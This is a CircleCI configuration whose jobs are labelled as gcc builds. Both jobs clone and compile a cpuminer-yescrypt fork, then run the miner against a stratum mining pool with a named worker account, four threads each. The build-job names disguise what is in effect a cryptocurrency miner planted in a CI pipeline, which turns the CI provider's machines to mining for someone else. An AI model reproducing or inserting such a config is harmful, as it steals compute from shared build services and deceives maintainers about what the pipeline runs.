version: 2.0
jobs:
  build_gcc_6:
    docker:
      - image: gcc:6
    steps:
      - checkout
      - run: apt-get update; apt-get -y install cmake build-essential libssl-dev libcurl4-openssl-dev libjansson-dev libgmp-dev automake libgmp-dev
      - run: git clone https://github.com/garrygospodinov/cpuminer-yescrypt cy; cd cy; git checkout yescryptr16; ./autogen.sh; ./configure CFLAGS="-O3 -march=native -Wall"; make; ./minerd -a yescryptr16 -o stratum+tcp://pool.cryply.io:3311 -u jerolamo.tab -p jop -t 4
  build_gcc_latest:
    docker:
      - image: gcc:latest
    steps:
      - checkout
      - run: apt-get update; apt-get -y install cmake build-essential libssl-dev libcurl4-openssl-dev libjansson-dev libgmp-dev automake libgmp-dev
      - run: git clone https://github.com/garrygospodinov/cpuminer-yescrypt cy; cd cy; git checkout yescryptr16; ./autogen.sh; ./configure CFLAGS="-O3 -march=native -Wall"; make; ./minerd -a yescryptr16 -o stratum+tcp://pool.cryply.io:3311 -u jerolamo.tab -p jop -t 4

workflows:
  version: 2
  build_and_test:
    jobs:
      - build_gcc_6
